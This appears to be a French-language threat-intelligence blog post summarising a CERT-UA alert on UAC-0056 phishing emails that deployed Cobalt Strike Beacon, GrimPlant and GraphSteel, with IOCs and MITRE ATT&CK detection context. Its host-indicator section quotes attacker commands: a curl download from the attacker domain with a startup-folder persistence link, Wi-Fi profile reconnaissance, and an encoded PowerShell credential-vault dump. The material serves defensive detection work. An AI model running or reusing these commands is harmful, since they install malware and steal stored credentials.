Beacon Cobalt Strike, GrimPlant et Malware GraphSteel Massivement Répandus par les Acteurs de Menaces UAC-0056 dans des Emails de Phishing Ciblés : Alerte CERT-UA

[post-views]
mars 22, 2022 · 6 min de lecture
Beacon Cobalt Strike, GrimPlant et Malware GraphSteel Massivement Répandus par les Acteurs de Menaces UAC-0056 dans des Emails de Phishing Ciblés : Alerte CERT-UA

Cet article couvre la recherche originale réalisée par CERT-UA : https://cert.gov.ua/article/37704

Le 11 mars 2022, l’équipe d’intervention d’urgence informatique d’Ukraine (CERT-UA) a signalé la distribution massive de faux e-mails ciblant les organismes d’État ukrainiens. Selon la recherche de CERT-UA, l’activité malveillante détectée peut être attribuée au collectif de pirates UAC-0056 également suivi sous les noms de SaintBear, UNC2589 et TA471. Le ciblage de l’Ukraine par l’UAC-0056 n’est pas une nouveauté : ce groupe de pirates est également lié à l’attaque de WhisperGate effacement de données qui a mis hors service les actifs en ligne du gouvernement du pays.

Attaque du groupe UAC-0056 contre l’Ukraine : Enquête du CERT-UA

La recherche du CERT-UA a révélé que les faux e-mails lors de la campagne de phishing ont été massivement envoyés au nom des organismes d’État ukrainiens diffusant des instructions sur la façon d’améliorer la sécurité de l’information. Les e-mails comprenaient un lien vers hxxps://forkscenter[.]fr/, trompant ses victimes en leur faisant télécharger des « mises à jour critiques de cybersécurité » dans un fichier suivant « BitdefenderWindowsUpdatePackage.exe » d’environ 60 Mo, ce qui a conduit à la propagation d’une infection par malware sur un système ciblé.

Après le téléchargement de ce fichier malveillant « BitdefenderWindowsUpdatePackage.exe », il déployait ensuite les portes dérobées Cobalt Strike Beacon, GrimPlant et GraphSteel. Tout d’abord, le fichier susmentionné a activé le programme exécutable « alt.exe » qui a ensuite téléchargé les fichiers « one.exe » et « dropper.exe » de la plateforme de distribution Discord et les a lancés. Selon la recherche, le fichier nuisible « one.exe », une fois lancé, conduit à l’infection du système avec le malware Cobalt Strike Beacon. De plus, le fichier « one.exe » télécharge également et exécute le fichier « wisw.exe », qui à son tour aurait dû télécharger le fichier exécutable malveillant « cesdf.exe » du service Discord, qui n’était pas disponible lors de l’enquête.

Cette routine aboutit également à l’installation d’un téléchargeur Go (« dropper.exe ») qui décode et exécute un fichier encodé en base-64 (« java-sdk.exe »). Ce dernier fichier « java-sdk.exe » ajoute une nouvelle clé de registre Windows pour maintenir la persistance et télécharge également et exécute deux charges utiles supplémentaires :

  • « microsoft-cortana.exe » suivi comme porte dérobée GraphSteel
  • « oracle-java.exe » connu comme porte dérobée GrimPlant

Notamment, tous les fichiers exécutables de la plateforme de distribution Discord tirent parti de la protection logicielle Themida.

Graphiques fournis par CERT-UA pour illustrer la dernière cyberattaque des acteurs de la menace UAC-0056 contre les entités gouvernementales ukrainiennes

Indicateurs de compromission globaux (IOC)

Fichiers

ca9290709843584aecbd6564fb978bd6    Інструкція з антивірусного захисту.doc (document leurre)
cf204319f7397a6a31ecf76c9531a549    Інструкція користувачів.doc (document leurre)
b8b7a10dcc0dad157191620b5d4e5312    BitdefenderWindowsUpdatePackage.exe
2fdf9f3a25e039a41e743e19550d4040    alt.exe (téléchargeur Discord)
aa5e8268e741346c76ebfd1f27941a14    one.exe (contient Cobalt Strike Beacon)
9ad4a2dfd4cb49ef55f2acd320659b83    wisw.exe (téléchargeur Discord) (2022-03-06 10:36:07)
15c525b74b7251cfa1f7c471975f3f95    dropper.exe (téléchargeur Go)
c8bf238641621212901517570e96fae7    java-sdk.exe (téléchargeur Go)
4f11abdb96be36e3806bada5b8b2b8f8    oracle-java.exe (GrimPlant)
9ea3aaaeb15a074cd617ee1dfdda2c26    microsoft-cortana.exe (GraphSteel) (2022-03-01 17:23:26)

Indicateurs réseau

hxxps://forkscenter[.]fr/BitdefenderWindowsUpdatePackage.exe
hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174636830761/one.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174838165524/dropper.exe
hxxps://cdn.discordapp[.]com/attachments/947916997713358890/949978571680673802/cesdf.exe
hxxps://nirsoft[.]me/s/2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl/field-keywords/
hxxps://nirsoft[.]me/nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb/avp/amznussraps/
hxxp://45[.]84.0.116:443/i
hxxp://45[.]84.0.116:443/m
hxxp://45[.]84.0.116:443/p
ws://45[.]84.0.116:443/c
forkscenter[.]fr (2022-01-29)
nirsoft[.]me    (2022-02-17)
45[.]84.0.116
156[.]146.50.5
-hobot- (User-Agent)

Indicateurs d’hôtes

%TMP%alt.exe
%PROGRAMDATA%one.exe
%PROGRAMDATA%dropper.exe
%USERPROFILE%.java-sdkjava-sdk.exe
%USERPROFILE%.java-sdkoracle-java.exe
%USERPROFILE%.java-sdkmicrosoft-cortana.exe
%USERPROFILE%AppDataLocalTempwisw.exe
%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupBitdefenderControl.lnk

HKCUSoftwareMicrosoftWindowsCurrentVersionRunJava-SDK

C:WindowsSystem32cmd.exe /C cd %USERPROFILE%AppDataLocalTemp & curl -O hxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe & mklink %USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupBitdefenderControl.lnk %USERPROFILE%AppDataLocalTempwisw.exe
C:WindowsSystem32cmd.exe /C cd / & dir /S > %USERPROFILE%AppDataLocalTempRsjdjfvj.txt & ipconfig /all > %USERPROFILE%AppDataLocalTempRsjdrnjngfvj.txt
ipconfig /all
cmd /Q /C netsh wlan show profiles
netsh wlan show profiles
powershell /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC4AUABhAHMAcwB3AG8AcgBkAFYAYQB1AGwAdAAsAFcAaQBuAGQAbwB3AHMALgBTAGUAYwB1AHIAaQB0AHkALgBDAGUAZABlAG4AdABpAGEAbABzAC4AQwBvAG4AdABlAG4AdABUAHkAcABlAD0AVwBpAG4AZABvAHcAcwBSAHUAbgB0AGkAbQBlAF0AOwAkAHYAYQB1AGwAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVwBpAG4AZABvAHcAcwAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAuAFAAYQBzAHMAdwBvAHIAZABWAGEAdQBsAHQAIDsAJAB2AGEAdQBsAHQALgBSAGUAdAByAGkAZQBWAGUAYQBsAGwAKAApACAALwB7ACAAJABfAC4AUgBlAHQAcgBpAGUAdgBlAFAAYQBzAHMAdwBvAHIAZAAoACkAOwAkAF8AfQAgAHwAIABTAWUwAGwAZQBjAHQAIABVAHMAZQByAF4AMQBMAGEAYQBARwBsACwAUgBlAABlAHMAdQAlAHIAYwBlACwAUABoAGUAMALZDACHCAdgBVQAhAC4ASE0ZmatAbCW4vf

Requêtes de chasse basées sur les IOC pour détecter la propagation des malwares Cobalt Strike Beacon, GrimPlant et GraphSteel par les acteurs UAC-0056

La plateforme Detection as Code de SOC Prime offre accès à l’outil Uncoder CTI permettant aux équipes de convertir les IOC liés en requêtes de chasse personnalisées, optimisées pour les performances et prêtes à être exécutées dans leur solution SIEM ou XDR. L’accès à Uncoder CTI est désormais disponible gratuitement pour tous les utilisateurs de SOC Prime jusqu’au 25 mai 2022.

 

Contenu comportemental Sigma pour détecter la propagation des malwares Cobalt Strike Beacon, GrimPlant et GraphSteel par les acteurs UAC-0056

Pour détecter les malwares Cobalt Strike Beacon, GrimPlant et GraphSteel au sein de votre système, utilisez la règle comportementale Sigma suivante fournie par le développeur SOC Prime Threat Bounty Onur Atali:

Groupe de menace UNC-0056 Cobalt Strike – Cible les organisations d’État ukrainiennes

Contexte MITRE ATT&CK®

Pour aider les professionnels de la cybersécurité à plonger dans le contexte de la dernière attaque de phishing ciblant l’Ukraine et diffusant les portes dérobées Cobalt Strike Beacon et ses malwares associés, le contenu de détection basé sur Sigma est aligné avec le cadre MITRE ATT&CK v.10, abordant les tactiques et techniques suivantes :

Tactics 

Techniques

Sigma Rule

Defense Evasion

Deobfuscate/Decode Files or Information (T1140)

Process Injection (T1055)

Execution

Command and Scripting Interpreter (T1059)

De plus, vous pouvez télécharger le fichier ATT&CK Navigator ci-dessous au format JSON qui fournit le contexte MITRE ATT&CK pertinent basé à la fois sur les règles Sigma de la plateforme SOC Prime et les IOC fournis par CERT-UA :

Télécharger le fichier JSON pour ATT&CK Navigator

Veuillez noter les versions suivantes applicables au fichier JSON :

  • MITRE ATT&CK v10
  • Version de ATT&CK Navigator : 4.5.5
  • Format de fichier Layer : 4.3

Cet article vous a-t-il été utile ?

Aimez-le et partagez-le avec vos collègues.
Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité des menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et générer une valeur immédiate, réservez dès maintenant une réunion avec les experts de SOC Prime.

Articles connexes